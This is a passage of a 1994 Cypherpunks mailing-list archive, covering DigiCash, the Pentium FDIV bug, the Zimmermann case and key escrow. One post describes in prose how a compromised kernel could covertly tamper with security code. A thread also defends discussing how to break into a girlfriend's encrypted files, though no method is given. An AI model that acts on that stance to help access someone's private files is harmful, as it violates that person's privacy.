Someone:
>
> > I don't think so. It appears that the initial implementation of
> >DigiCash works exactly that way [based on what I've read on their W3
> >server]. Of course, I could tell you more exactly had they replied to
> >any of my four separate attempts to try it out ..
>
> Interesting. I too have made four requests and still not received any
> software. Can you say "vapor?"
>
> dave

It says very clearly at the DigiCash web site that the technology is NOT LICENSED FOR USE IN THE USA. I've been using the client quite happily from India; though I know for sure that US sites (eg. HotWired) have e-cash servers, there are obviously difficulties in using it there.
-----------------------------------------------------------------------------
Rishab Aiyer Ghosh "In between the breaths is
rishab at dxm.ernet.in the space where we live"
rishab at arbornet.org - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA

From rishab at dxm.ernet.in Wed Dec 28 15:43:20 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Wed, 28 Dec 94 15:43:20 PST
Subject: Morality masks technical ignorance
Message-ID:

The moralistic rubbish in response to the Norton Encrypt post is just cover for a surprising technical ignorance about the product among Cypherpunks (myself included).

Funny. We'd all have kept shut if the question was "I forgot my NE password. What do I do?" Maybe we should stop discussing anonymous remailers lest they be put to 'amoral' use?

I always thought the emphasis on this list was on _technological_ rather than _political_ or _legal_ or _moral_ means to protect privacy and free expression - including the current limitations. The inevitability of technology confounding laws - BlackNet as the 'dark' aspect and "National borders are just speed bumps on the information superhighway" as the 'good' side. That's what makes Cypherpunks different from comp.org.eff.talk and alt.privacy, IMHO.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh "In between the breaths is
rishab at dxm.ernet.in the space where we live"
rishab at arbornet.org - Lawrence Durrell
Voice/Fax/Data +91 11 6853410
Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA

From die at pig.die.com Wed Dec 28 15:44:52 1994
From: die at pig.die.com (Dave Emery)
Date: Wed, 28 Dec 94 15:44:52 PST
Subject: Why I have a 512 bit PGP key
In-Reply-To: <35603.pfarrell@netcom.com>
Message-ID: <9412282344.AA05935@pig.die.com>

> Pat Farrell writes:
>
> But I see it as more germane than Eric. It is not about
> arbitrary self perpetuating bugs from source.
> It is about serious security holes that are self perpetuated
> by the binaries of the compiler. The compiler ignores
> its own source and generates security hacked binaries,
> even when the source looks like it is corrected.

I hate to remind everyone, but it is possible to actually inspect the compiled binary output by hand with a debugger and even trace its execution step by step through the usually small security sensitive sections of code. While Thompson's famous hack was clever indeed, it basically depended on security by obscurity - if someone had looked at the generated machine code they easily could have spotted the hook that inserted the magic password. Granted of course this is a lot of work, but so is modifying a compiler or perhaps several of them to selectively insert security hooks.

On the other hand Eric's point about execs is more telling however, if the evil sysadmin controls the kernel it is quite possible for him to arrange to have the kernel recognize when the security program code is running and fudge the state of the security code variables by interrupting its execution at a private to the kernel breakpoint and invoking code that patches the state of the data or stack areas and then returns to the user code. Since the user process is effectively running on a virtual machine it would be very difficult to create code that would reliably detect such selective violations in the consistency of the virtual machine, especially as code to check for such violations has to run on the same virtual machine and can also be diddled with by the kernel.

In fact if the kernel one is running security code under is not 100% trustworthy no amount of cleverness at the user level can prevent it from obtaining any private information or modifying any private data it wants. And if the hacker is clever enough this can be made nearly invisible to any application program and can be used to do almost anything desired.
And since the kernel (/vmunix or whatever) files are accessible to anyone with root and are not integrity checked on bootup, such a hack could be planted by some j. random hacker who had root momentarily and activated much later (perhaps via an obscure user level control file somewhere that specified the gory details of what to recognize and patch). Dave Emery die at die.com From entropy at IntNet.net Wed Dec 28 16:08:12 1994 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 28 Dec 94 16:08:12 PST Subject: DigiCash unlicensed for US use In-Reply-To: Message-ID: > It says very clearly at the DigiCash web site that the technology is NOT > LICENSED FOR USE IN THE USA. I've been using the client quite happily from > there are obviously difficulties in using it there. Marvelous. Regardless of licensing, if you were to look at the list of shops which accept DigiCash e-$, you'd notice that a fairly large number of them are in the United States. (see http://www.digicash.nl/ecash/shops.html) The document I refer to (http://www.digicash.nl/ecash/trial.html) also states that attendees of a W3 conference in Chicago will receive $50.00 in extra e-$. This would seem to preclude US citizenship being a stumbling block to being in on the testing program. Perhaps I'm just not 3133+ enough. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 ) From die at pig.die.com Wed Dec 28 16:31:47 1994 From: die at pig.die.com (Dave Emery) Date: Wed, 28 Dec 94 16:31:47 PST Subject: Are 2048-bit pgp keys really secure ? In-Reply-To: <9412290859.ZM12937@wiley.sydney.sgi.com> Message-ID: <9412290031.AA06235@pig.die.com> > > A somewhat disturbing trend has appeared in the low-end cost-sensitive PC > SIMM market. Some supposedly 9-bit SIMMs are actually 8-bit SIMMs plus > a parity generator.
This means that the parity checking is essentially > subverted, because the parity bit is generated from the stored contents > of memory at read time, rather than the stored contents when it was > written to. As such, NO bit errors are detected. > > These SIMMs are almost all being produced in Taiwan, and many have the > parity generator marked so that the chip appears to be another DRAM. > It is worth watching out for. > > Why are they doing this? Well, parity generators are much cheaper than > the extra DRAM, and so the manufacturers are saving 15-20% on the production > price. > > Ian. > There is, or was a couple of years ago, another reason for this. One of the major SIMM patents is for SIMMs with parity and does not apply to SIMMs without (a matter of how the claims were phrased), so companies that don't want to pay royalties to Wang in the US (the owner of MOST SIMM patents) have used this trick not primarily to cut product cost but to avoid paying royalties (something like 5%). From dwomack at runner.utsa.edu Wed Dec 28 17:04:06 1994 From: dwomack at runner.utsa.edu (Dave) Date: Wed, 28 Dec 94 17:04:06 PST Subject: Phil Zimmerman???? Message-ID: <9412290104.AA11633@runner.utsa.edu> I saw an earlier post discussing problems that Phil Zimmerman was facing. Is there any information about what those might be? Regards, Dave From MWOHLER at ix.netcom.com Wed Dec 28 17:35:13 1994 From: MWOHLER at ix.netcom.com (Marc Wohler) Date: Wed, 28 Dec 94 17:35:13 PST Subject: Phil's plight *our fight* Message-ID: <199412290134.RAA07999@ix2.ix.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Nick (The: prince at alpha.c2.org) asks: "If we don't take care of our own, who will?" I have made a pitifully small contribution to Phil Zee's LDF My first contribution to *any* cause in 20 years. C'mon c'punks this is where the rubber meets the road. Where are the fax distribution lists? Let's do it.
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwIQHmeikzgqLB7pAQFQ6gP/axPGNzgNMDmTPL4PeluIdZRYffhTfr4R BVOnUvXi13Eyob6C8Z+pPFDyAAl4IPDhoseU68dLpyL2jQ8vd7xTJU2FeLJYKhQV qgl7pWb1R/SB35kclRqMUmS0kMM/xRsmR7loLfhSTs9j2cG/1hO7DG3HkrHszfmQ N6rXVZIt8cU= =3wWQ -----END PGP SIGNATURE----- -- ***Preserve, Protect and Defend the private use of Strong Crypto*** * * * PGP for the masses * * * Finger mjwohler at netcom.com for Marc Wohler's public key fingerprint= F1 70 23 13 91 B5 10 63 0F CF 33 AD BE E6 7B B6 From arromdee at blaze.cs.jhu.edu Wed Dec 28 21:31:14 1994 From: arromdee at blaze.cs.jhu.edu (Ken Arromdee) Date: Wed, 28 Dec 94 21:31:14 PST Subject: Breaking into girlfriend's files Message-ID: <9412290531.AA12756@toad.com> Black Unicorn: >Person A requests information. >Person B says no, because the use of the information is unsound in person >B's view. >Censorship? You tell me. Not unless person B is trying to force other people not to give out the information. Failure to release the information himself is not censorship; it doesn't matter what his reasons for doing so are. -- Ken Arromdee (email: arromdee at jyusenkyou.cs.jhu.edu) "No boom today. Boom tomorrow, there's always a boom tomorrow." --Ivanova From karn at unix.ka9q.ampr.org Wed Dec 28 22:19:49 1994 From: karn at unix.ka9q.ampr.org (Phil Karn) Date: Wed, 28 Dec 94 22:19:49 PST Subject: IPSP and Netscape Message-ID: <199412290621.WAA07850@unix.ka9q.ampr.org> In article <94Dec13.08.6313 at qualcomm.com>, you write: |> Privacy and authentication are also provided by IPSP. However, IPSP |> provides all sorts of advantages -- immunity from traffic analysis, no |> requirement to change the way an application operates to start using |> it, protection of the entire IP stack (not just TCP sockets), very |> minimal changes required to applications that want to use the |> information provided by the IPSP layer for authentication (and no need |> to change your read or write calls or anything), etc, etc, etc. 
Uh, I don't see that IPSP provides any automatic immunity to traffic analysis. It does make certain kinds of fine-grained traffic analysis a little more difficult. E.g., you can't tell what upper level protocols are in use, and if you share a single SAID between each host pair you can't tell which or how many users are sharing the path. But you can still tell that the hosts are communicating. If you use IPSP in the IS-IS tunnel mode, you could help protect the identities of the end systems on each end, but again you can't hide the fact that the ISes are talking. Something like IPSP *could* serve as the basis of an anonymous forwarding IP network analogous to the existing anonymous remailers, but this would take a lot more work. And you could generate bogus filler traffic between a pair of IPSP hosts to help cover the real traffic between them. Phil From blancw at pylon.com Wed Dec 28 23:46:27 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Wed, 28 Dec 94 23:46:27 PST Subject: Breaking into girlfriend's files (Uni Doesn't Get It) Message-ID: <199412290747.XAA10144@deepthought.pylon.com> >> From: Dave Mandl: Could you send me some powerful handguns and silencers? Oh, and while you're at it, give me all of your addresses and precise travel schedules for the next two weeks. As an "amoralist," I'm sure you won't put short term morality before my long-term goal. Thanks. >From Uni: I fear what you request would probably violate many laws. Providing you with weaponry has little to do with providing you the information you might need to obtain and modify such weapons as you will need. ......................................................... Uni, if the laws did not reflect your own moral stand regarding the uses of technology, would you nevertheless not have any personal thoughts at all on the matter? Laws come from the mind of mankind, you know, not vice versa. 
(Unless, of course, one is mindless and absolutely needs someone else's decisions to guide their moral reasoning.) .. Blanc From blancw at pylon.com Wed Dec 28 23:47:02 1994 From: blancw at pylon.com (blancw at pylon.com) Date: Wed, 28 Dec 94 23:47:02 PST Subject: Morality masks technical ignorance Message-ID: <199412290747.XAA10148@deepthought.pylon.com> Responding to msg by rishab: I always thought the emphasis on this list was on _technological_ rather than _political_ or _legal_ or _moral_ means to protect privacy and free expression - including the current limitations. ....................................................... So Rishab - do you think there's any good reason why governments shouldn't require the implementation of key escrow (GAK) (I mean, aside from what something like the US Constitution would have to say about it), or any good reason why any cypherpunk should protest it? The key words in my inquiry are *reason why*. .. Blanc From lmccarth at freya.cs.umass.edu Thu Dec 29 02:08:36 1994 From: lmccarth at freya.cs.umass.edu (lmccarth at freya.cs.umass.edu) Date: Thu, 29 Dec 94 02:08:36 PST Subject: Premier Rae of Ontario Message-ID: <199412291013.FAA20889@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- A week or so ago I incorrectly referred to Bob Rae as the Prime Minister of Canada, when he is in fasct the Premier of the Province of v Ontario. As a former resident of OttOttawa, I'm well aware of the division of Canada into provinces. I misunderstood not the nature of the office itself, but rather the identity of the individual involved. I appreciate being corrected, but now I *have* been corrected, I really don't need any more mail about the issue. Thanks BTW this message is full of typos because I'm using a typically lousy terminal emulator program on dialup from a PC to a Unix system, which does not offer any support (AFAIK) for the crucially-important backspace key/ character. 
Suggestions on any sort of packasge offering an improvement would be welcomed. The ones I have now offer me heaps of fancy features I never use, and hold my hand through many parts where I don't need it. Incompatible standards sauck. This is very annoying so I'm getting out now. (Not signing because this connection is terrible) - -L. Futplex McCarthy - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLwKLzyoZzwIn1bdtAQEDwQGAje19PbaItVp7+fGPu7k/81IWixDxKsEE GKfVfoSKLxpLfGXv6cW2Vd9vSGIqXqxq =c1pZ -----END PGP SIGNATURE----- From dubois at csn.org Thu Dec 29 06:42:30 1994 From: dubois at csn.org (Philip L. Dubois) Date: Thu, 29 Dec 94 06:42:30 PST Subject: Phil Zimmermann Message-ID: <199412291442.AA18076@teal.csn.org> -----BEGIN PGP SIGNED MESSAGE----- Phil Zimmermann and his defense team are heartened by the substantial outpouring of support that has been demonstrated through numerous postings in this and other news groups. As we approach a crucial meeting with the prosecutor, it is particularly encouraging to see that many others are willing to devote themselves, both financially and through volunteered time, to Phil's defense. A number of postings have suggested a variety of support activities ranging from petitions to the President to gatherings in San Jose. Phil's lawyers are concerned that some of these activities would not assist in our efforts to protect his legal interests and could in fact hurt. The upcoming meeting with the prosecutor is not a court hearing, but is a private meeting of counsel. Neither Phil nor any judicial official will be present. It will not be a trial or hearing, but a discussion with the Assistant United States Attorney who is handling Phil's case. 
As such, it is not an appropriate setting for any public demonstrations of support for Phil or for unrestricted dissemination of cryptography. What Phil needs at that meeting is a quiet environment in which serious legal issues can be discussed candidly in an effort to avoid the necessity for any trial. Given the purposes and importance of the meeting, we -- and most especially Phil Zimmermann -- ask that any of his supporters not come to San Jose for any form of public demonstration. We encourage you instead to continue to support Phil's defense by financial contributions. Communications of support to government officials in Washington, DC are also appropriate and helpful. To the extent that effective representation of Phil's interest permits us to communicate with his supporters, we will periodically post announcements to this and other appropriate news groups. Philip L. Dubois Lawyer -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLwJTObZ7C+AHeDONAQH1jAP/T6ZMSIAbgjfLliPbDALVMaOkuHBHGdeq ny0KPsZhIz6/K6ate8yr1uF84RtdolHMx73DBpSf6L9H7d3zcPVfy3ArAv44J/kZ jX0y36eCcn9pxhtU+41k9vkSLnGaNdiM5JKpehbRLgP0Gm+dAq0tbGNIXwL0XOEq CKmZXTWj/vs= =4hhB -----END PGP SIGNATURE----- From camp at industrial.com Thu Dec 29 07:01:09 1994 From: camp at industrial.com (camp at industrial.com) Date: Thu, 29 Dec 94 07:01:09 PST Subject: This list and a question Message-ID: I just joined this list last week, I may have been grievously mistaken, but I thought that this list talked about technical issues of being a cypherpunk. It seems to me that most of the things posted here belong in a newsgroup rather than in my mailbox. So I guess the question is: Is there a cypherpunk newsgroup, and if there isn't why? I am not complaining so much about the content, but I get so many mail messages about things that I would just as soon miss in my mail box that I have a hard time finding the messages that I do want. Just a thought. . . . Hey and is there some sort of FAQ?
gemnis From adam at bwh.harvard.edu Thu Dec 29 07:34:49 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 29 Dec 94 07:34:49 PST Subject: Morality masks technical ignorance In-Reply-To: <199412290747.XAA10148@deepthought.pylon.com> Message-ID: <199412291533.KAA04604@bwh.harvard.edu> The technical reason to oppose GAK is that it adds points of failure to a crypto system which need not be there. Those POF are not adequately tied to the consequences of their actions (releasing a key improperly), and as such will be used as points to attack the integrity of the system. Adam Blanc wrote: | Responding to msg by rishab: | | I always thought the emphasis on this list was on | _technological_ rather than _political_ or _legal_ or _moral_ | means to protect privacy and free expression - including the | current limitations. | ....................................................... | | So Rishab - do you think there's any good reason why | governments shouldn't require the implementation of key escrow | (GAK) (I mean, aside from what something like the US | Constitution would have to say about it), or any good reason | why any cypherpunk should protest it? | | The key words in my inquiry are *reason why*. From bshantz at spry.com Thu Dec 29 08:42:41 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Thu, 29 Dec 94 08:42:41 PST Subject: Pentium FDIV Message-ID: <199412291643.IAA25785@homer.spry.com> Haven't seen too much discussion of this and how it would affect crypto in general. Would the FDIV problem cause any problems when looking at large prime numbers? Actually, let me rephrase that, would it affect determining if a large number is prime? Floating point errors can be so much fun. Also, does anyone have the "test" that was floating around the net and in various newspapers a few weeks to see if your machine has the FDIV problem. I lost the little "post-it note" I had it written on. Since then, I haven't been able to reproduce it. 
(Either the bug went away, or I entered the wrong numbers. **GRIN**) --Brad >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 --------------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From paul at poboy.b17c.ingr.com Thu Dec 29 09:08:20 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 29 Dec 94 09:08:20 PST Subject: DigiCash unlicensed for US use In-Reply-To: Message-ID: <199412291706.AA05312@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Rishab wrote: > Someone: > > > > > I don't think so. It appears that the initial implementation of > > >DigiCash works exactly that way [based on what I've read on their W3 > > >server]. Of course, I could tell you more exactly had they replied to > > >any of my four separate attempts to try it out .. > > > > Interesting. I too have made four requests and still not received any > > software. Can you say "vapor?" > > > > dave > It says very clearly at the DigiCash web site that the technology is NOT > LICENSED FOR USE IN THE USA. I've been using the client quite happily from > India; though I know for sure that US sites (eg. HotWired) have e-cash > servers, there are obviously difficulties in using it there. Not. What one page on their server (http://www.digicash.com/ecash/ecash-win.html) used to say was that there are two versions of the MS Windows client. One uses the PGP 2.3 MPI library, and that version is not licensed for US use; the other uses the RSAREF library, and, while slower, it's legal for US users. There's now only one choice for the MS Windows version-- I suspect that means that v2.02 and later use only the RSAREF library. 
Actually, there's not a separate ecash "server" per se. If you want to accept ecash payments (plug: check out my store at http://www.iquest.com/~fairgate), you just write a CGI script that calls the ecash client. Nothing much to it. - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwLsnafb4pLe9tolAQEU9wP/Qfw3ooE36BThLZhJzA5c0mofxxok7NL+ 9Pkvv7erVsbad8wOC0gjOGDe+NHSznBPBjbMPITXJApSEJiEnmEJZNeBd3fWhhzL Ze0/p6FKUusHSkpjKos7kWvycg/Shkzhkplh/vil6We8fmBYG49l+f4EaBgIJEvh RgecCqkk8iQ= =r/d7 -----END PGP SIGNATURE----- From paul at poboy.b17c.ingr.com Thu Dec 29 09:10:36 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Thu, 29 Dec 94 09:10:36 PST Subject: Pentium FDIV In-Reply-To: <199412291643.IAA25785@homer.spry.com> Message-ID: <199412291710.AA05400@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > Haven't seen too much discussion of this and how it would affect crypto in > general. Would the FDIV problem cause any problems when looking at large > prime numbers? Actually, let me rephrase that, would it affect determining > if a large number is prime? Floating point errors can be so much fun. I don't know how you missed it; it was certainly here. Let me summarize: - crypto typically uses integers - RSA crypto uses large integers - the Pentium FDIV bug only affects floats - -Paul - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. 
### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwLtj6fb4pLe9tolAQGNXAQAy61AjCjq10ZnsmozlpzanYLqtOib1Hfw hW1M6uh6sYe7fAqhgILJ0OSKuOkCtXoHHX/rMBchrYdPr/LCUSZHoXQHvxQJpYWb B+jBegxBO+vKa/yOV/JgzVSsg2jCraxnextAXSXuniZU149+MWhp0wQ1Pmh19BqD 2J7wRHVehMs= =kebO -----END PGP SIGNATURE----- From jrt at asiaonline.net Thu Dec 29 09:12:30 1994 From: jrt at asiaonline.net (jRT) Date: Thu, 29 Dec 94 09:12:30 PST Subject: Pentium FDIV In-Reply-To: <199412291643.IAA25785@homer.spry.com> Message-ID: Try (4,195,835 x 3,145,727) / 3,145,727. A faulty Pentium returns 4,195,579. Regds ------------------------------------------------------------------------------ jrt at AsiaOnline.Net john at AsiaOnline.Net PO Box 86141, Govt PO, Kln, HKG. Help protect the environment : This message is made from recycled electrons ------------------------------------------------------------------------------ On Thu, 29 Dec 1994 bshantz at spry.com wrote: > Haven't seen too much discussion of this and how it would affect crypto in > general. Would the FDIV problem cause any problems when looking at large > prime numbers? Actually, let me rephrase that, would it affect determining if > a large number is prime? Floating point errors can be so much fun. > > Also, does anyone have the "test" that was floating around the net and in > various newspapers a few weeks to see if your machine has the FDIV problem. I > lost the little "post-it note" I had it written on. Since then, I haven't > been able to reproduce it. (Either the bug went away, or I entered the wrong > numbers. **GRIN**) > > --Brad > > >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< > Brad Shantz bshantz at spry.com > Senior Software Engineer > SPRY Inc.
Direct #: (206)-442-8251 > --------------------------------------------------------------------- > PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html > Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< > > From sandfort at crl.com Thu Dec 29 09:37:42 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 29 Dec 94 09:37:42 PST Subject: HACK ATTACK Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Was I the only one who saw ``Hack Attack'' on the Discovery Channel? The promos were typically sensationalistic. `In cyber- space, there is no privacy.' `Teenage hackers can read, change or destroy your computer files.' `No one is safe.' Yada, yada, yada. Phyber Optik was interviewed in prison. A number of events were illustrated using `dramatic re-enactments.' Cop types told scary stories that, more often than not, ended with a statement like, ``The meltdown was caused by a programming error, but it could just have easily been done by a malicious teenage boy in his bedroom.'' They did do a fair job of defining and distinguishing the terms: `hacker,' `phreaker' and `cracker.' However, I don't recall ANY mention of encryption as a means of protecting privacy. Anyone else see it? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From matthewn at uiuc.edu Thu Dec 29 09:57:33 1994 From: matthewn at uiuc.edu (Matt Hewn) Date: Thu, 29 Dec 94 09:57:33 PST Subject: Breaking into girlfriend's files Message-ID: <199412291757.AA28913@ux1.cso.uiuc.edu> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com From: Matt Hewn > Black Unicorn writes: > > > Person A requests information. > > Person B says no, because the use of the information is unsound in > > person B's view. > > Censorship? You tell me. 
> > Not unless person B is trying to force other people not to give out the > information. Failure to release the information himself is not censorship; > it doesn't matter what his reasons for doing so are. Person A requests information from Group C. Person B is a member of Group C. Person B does not ignore Person A. Person B does not speak with Person A. Person B responds to Person A by addressing Group C. Why? If the last sentence I quoted is true, then why tell _us_ why he won't release the information. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBFAgUBLwL4cofkdnX+hcrBAQG+bAGAiXtYzCTQ2+3OOyi+CZg8aAQOS3Yw0w4R OqzDaiy03wyj+CviwvYQl/0GpoOG0d4B =TRQR -----END PGP SIGNATURE----- -- Matt Hewn -- Information is not knowledge; knowledge is not wisdom; wisdom is not truth. Truth is absolute. From jim at acm.org Thu Dec 29 10:07:40 1994 From: jim at acm.org (Jim Gillogly) Date: Thu, 29 Dec 94 10:07:40 PST Subject: Pentium FDIV In-Reply-To: <199412291710.AA05400@poboy.b17c.ingr.com> Message-ID: <199412291807.KAA19437@mycroft.rand.org> > paul at poboy.b17c.ingr.com (Paul Robichaux) writes: > I don't know how you missed it; it was certainly here. Let me summarize: > - crypto typically uses integers > - RSA crypto uses large integers > - the Pentium FDIV bug only affects floats Yes, but Prof. Nicely found the problem because he was using FDIV when doing something or other with large potential primes. For most of our crypto stuff integer is fine, but for some operations on 33- to 50-bit integers it may be faster to use the floating point ops, since IEEE fp is supposed to be exact for integers up to some number of bits in the 50's. Jim Gillogly Sterday, 7 Afteryule S.R. 
1995, 18:07 From matthewn at uiuc.edu Thu Dec 29 10:44:48 1994 From: matthewn at uiuc.edu (TheElusiveMatthew) Date: Thu, 29 Dec 94 10:44:48 PST Subject: Breaking into girlfriend's files Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Sorry to mail this twice, but I realized I munged the attributions, and wanted to get it right. Ken Arromdee wrote: > Black Unicorn wrote: > > > Person A requests information. > > Person B says no, because the use of the information is unsound in > > person B's view. > > Censorship? You tell me. > > Not unless person B is trying to force other people not to give out the > information. Failure to release the information himself is not censorship; > it doesn't matter what his reasons for doing so are. Person A requests information from Group C. Person B is a member of Group C. Person B does not ignore Person A. Person B does not speak with Person A. Person B responds to Person A by addressing Group C. Why? If the last sentence I quoted is true, then why tell _us_ why he won't release the information? TheElusiveMatthew -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBFAgUBLwMDqIfkdnX+hcrBAQG5gwGAmsK9B5hFkxrre8bvaMEl428irlLSHFZf zXocaI55xpr4ZvImCPpI/BNpKhUI0o6f =sBQJ -----END PGP SIGNATURE----- From adam at bwh.harvard.edu Thu Dec 29 10:52:48 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 29 Dec 94 10:52:48 PST Subject: rfcs 1750 & 1751 Message-ID: <199412291855.NAA28421@hermes.bwh.harvard.edu> FYI, RFCs 1750 & 1751 have been issued. 1750 discusses generating strong random numbers. 1751 standardizes a means of converting a 128 bit number to a set of English words. Adam -- "It is seldom that liberty of any kind is lost all at once." 
-Hume From p.v.mcmahon.rea0803 at oasis.icl.co.uk Thu Dec 29 11:38:29 1994 From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk) Date: Thu, 29 Dec 94 11:38:29 PST Subject: rfcs 1750 & 1751 Message-ID: <9412291940.AA05433@getafix.oasis.icl.co.uk> > FYI, RFCs 1750 & 1751 have been issued. 1750 discusses generating > strong random numbers. 1751 standardizes a means of converting a 128 ^^^^^^^^^^^^ > bit number to a set of English words. Both are informational, and don't represent standards of any kind - although RFC1750 has been subject to extensive review and scrutiny within the IETF security area. - pvm From witter at utdallas.edu Thu Dec 29 12:03:48 1994 From: witter at utdallas.edu (witter at utdallas.edu) Date: Thu, 29 Dec 94 12:03:48 PST Subject: HACK ATTACK In-Reply-To: Message-ID: On Thu, 29 Dec 1994, Sandy Sandfort wrote: > > Was I the only one who saw ``Hack Attack'' on the Discovery > Channel? The promos were typically sensationalistic. `In cyber- > space, there is no privacy.' `Teenage hackers can read, change > or destroy your computer files.' `No one is safe.' Yada, yada, > yada. I had to tape it, but yeah, I saw it. Seemed a bit retro-War Games type documentary to me also... > They did do a fair job of defining and distinguishing the terms: > `hacker,' `phreaker' and `cracker.' However, I don't recall ANY > mention of encryption as a means of protecting privacy. I also noticed that their re-enactor was wearing surgical gloves...? Seems a little strange since they supposed he was a teenager at home. Then again, perhaps he knows something about privacy that we do not? (I knew someone was ratting out on me, never guessed it was my keyboard...) Also, in one of the re-enactments he states, "I'm in! I control the horizontal and the vertical..." yeah buddy, well I've got the brightness and contrast too...sheesh! Perhaps The Discovery Channel would like to know about encryption, etc.
They listed their address as: pheedback at discovery.com [No signature, but here's my photo..] ......... . ''''' . . O O . . u . . \_/ . ......... From rsalz at osf.org Thu Dec 29 12:37:57 1994 From: rsalz at osf.org (Rich Salz) Date: Thu, 29 Dec 94 12:37:57 PST Subject: HACK ATTACK Message-ID: <9412292034.AA21108@sulphur.osf.org> > in one of the re-enactments he states," I'm in! I control the > horizontal and the vertical..." It's a tag line from the old TV show The Outer Limits. /r$ From rishab at dxm.ernet.in Thu Dec 29 12:58:42 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Thu, 29 Dec 94 12:58:42 PST Subject: Morality masks technical ignorance Message-ID: blancw at pylon.com: > Responding to msg by rishab: > I always thought the emphasis on this list was on > _technological_ rather than _political_ or _legal_ or _moral_ > means to protect privacy and free expression - including the > current limitations. > ....................................................... > So Rishab - do you think there's any good reason why > governments shouldn't require the implementation of key escrow > [...] > The key words in my inquiry are *reason why*. And the key word in _my_ post was _means_, not _reason why_. I.e. that (in my view of the Cpunk position) one can protect privacy not through morals, policies or law, but through technology. There may be very good reasons why governments should not require the implementation of key escrow, or why people shouldn't pry into their girlfriends' secrets (which if you really want to know I find reprehensible). Unfortunately those reasons of morality need not prevent the actions. Which is why Cypherpunks discuss untraceable anonymous remailers despite occasionally (aka Detweiler, for instance) decrying their (immoral) misuse, and why they should discuss breaking Norton Encrypt (or DES, or Skipjack, or 16384-bit RSA keys), while giving sermons about immoral boyfriends.
Nobody (the Single-Horned One included) thinks reading other people's mail is moral, but that should not preclude a legitimate discussion of crypto technology. As it so happens, hardly anyone here knew about Norton Encrypt so we got embroiled in this argument. If we were to adopt a consistently (and solely) moral stance, we would accept Detweiler's position that remailers are bad and should be banned because they can be easily misused. Well, I guess these are the glitches in discourse we have to face on a list that's for both technology and policy. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From dcwill at python.ee.unr.edu Thu Dec 29 13:33:03 1994 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Thu, 29 Dec 94 13:33:03 PST Subject: Pentium FDIV In-Reply-To: <199412291643.IAA25785@homer.spry.com> Message-ID: <199412292132.NAA18542@python> > Also, does anyone have the "test" that was floating around the net and in > various newspapers a few weeks to see if your machine has the FDIV problem. I > lost the little "post-it note" I had it written on. Since then, I haven't > been able to reproduce it. (Either the bug went away, or I entered the wrong > numbers. **GRIN**) This is from the djgpp (DOS port of gcc) mailing list, posted by the author of said port himself. It's short enough to post and might be helpful to some. Flames 